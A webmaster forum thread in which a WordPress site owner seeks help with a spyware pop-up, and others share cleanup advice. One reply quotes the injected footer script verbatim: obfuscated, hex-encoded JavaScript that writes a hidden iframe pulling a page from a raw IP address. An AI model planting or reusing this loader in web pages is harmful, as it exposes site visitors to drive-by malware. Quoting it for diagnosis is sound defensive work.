please check my site for virus

this is my site http://beautymakeupdivas.com and when I click on the categories I get a spyware window. do you get it too please check.

do I need a make a fresh install.

 

The only thing I saw fishy in your sites' code was the following that was on the bottom:

<script>
<!--
var d=document,kol=561;
function O10H485E4FAA5AA64(H485E4FAA5B22B){ function H485E4FAA5B623() {var H485E4FAA5BA1F=16;return H485E4FAA5BA1F;} return( parseInt(H485E4FAA5B22B,H485E4FAA5B623()));}function H485E4FAA5BE1D(H485E4FAA5C218){ function H485E4FAA5CE0D() {var H485E4FAA5D209=2;return H485E4FAA5D209;} var H485E4FAA5C614='';for(H485E4FAA5CA27=0; H485E4FAA5CA27<H485E4FAA5C218.length; H485E4FAA5CA27+=H485E4FAA5CE0D()){ H485E4FAA5C614 += ( String.fromCharCode (O10H485E4FAA5AA64(H485E4FAA5C218.substr(H485E4FAA5CA27, H485E4FAA5CE0D()))));}return H485E4FAA5C614;} document.write(H485E4FAA5BE1D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323938353832292B2766663933653563615C272077696474683D363734206865696768743D343433207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

PHP:

So it's probably in your footer.php file or something.

 

so which file should I change. I cant understand what to do.

 

Did not see anything strange but i did not check the code just search

 

do you mean to say that all you people donot see the spyware window.
to see the spyware window click on the categories.

 

I have windows one care and when I went to this site it prompt to clean windows download trojan, so don't go visiting this site!

 

it happened with me too, it happened with every website i opened.
then I installed Anti ARP, re installed my windows xp and installed Avast anti virus.
Its ARP attacks you are having.
Install Anti ARP , its the only good solution to this problem.

I had this problem about a week ago before I started using Anti ARP

 

are you talking about my site beautymakeupdivas.com



I have formatted my hard disk and installed windows XP. so there is no virus in my pc now.

please some somebody knowledgeable help me.

what to do to remove virus from my site.

my site is getting traffic, somebody help me fast.

 

please somebody read this thread.

I got my pc formatted and contacted my host.
they deleted all my files everything. and there are no folders now.

I made a complete fresh install of wordpress and made a first post today and when I clicked on categories I get this window of virus.

I am fed up.

should I change my host.

I cant understand what to do.

the host deleted every file and folder and everything is new now, but I still get the virus window.
should I change my host.
I am using hostmonster.

 

Look sometimes the virus is not on your PC

Are you in a LAN network or something? because it happened with me i am in a network and i had spyware alert in every page i open then i found out that One of the PC's on the network was infected which caused this it uses some sort of ARP attacks so try to get anti ARP

 

virus is not in my pc because I formatted it.

virus is not on LAN network because other the sites that I am surfing, I cannot see the virus.

The virus is in my wordpress installation.

everytime I install a new wordpress it gets loaded.

I have deleted all files my host and installed wordpress again, then to it is infected.

 

falguni1,

i agree that the problem (trojan?) isn't on your pc, nor on you LAN. but i don't think it's on your wordpress, because people with other cms (or even wrote their own php script) are infected too.

imho, my best guess is it's on the process, it might be cracked ftp warez or unsafe ftp password.
i just changed my ftp client, fixed infected file (index.php or index.html), and changed ftp password.

and -voila- problem's solved!

this is also a discussion to view hxxp://wordpress.org/support/topic/182061 (you already knew).

ps.
a friend of mine was too late to repair, then google marked it as dangerous, and his webhost deleted his files .. so please be quick.

may this help.

regards,
kalapacengkir

 

I had this a few days ago and now have it cleaned.

Basically a hacker has got in to your site via a insecure php script (both cutenews and coppermine have been named but it could be hundreds of different things. Maybe even a dud wordpress plugin)

The guy uploads some hidden file in like a jpeg or something (some people found a zip files so search your server for any weird ones)

He then activates it somehow and all files with the prefix index and sometimes login are injected with the code that was shown above causing the popup to show the virus. Users then blindly install the software only to have their pc frozen and forced to send the hacker money.

What I did was uninstall any unnecessary php scripts and their databases. Changed all the databases users and passwords. Replaced all my server files with backups from a few weeks ago (you could clean the files manually by removing the code although I found there was some kind of lock that prevent them from opening in notepad) Once you are sure the server is clean ask your host to use a virus scan or use cpanels virus scan if you have it.

Once that is done change your ftp/cpanel password and you may even want to change ftp client.

After two days I'm clean - but don't fall in to the trap of removing the code from the few files you think it is infected in because it comes back. Wipe everything or replace it all with a backup.

Be quick because my site got labeled as harmful by google and have since lost 50% of traffic - it'll take days before they re-review my site.

 

here is what I did.

reset my hosting account means deleted all files.
and changed my login password, now I did fresh install and everything is ok because I changed my password.

 

Please please help, my website divineaccessories.com was hacked a couple of months ago then I got all viruses removed and put up a new site with webprotection seal, but it appears that it has virus in it. Can somebody please check and advice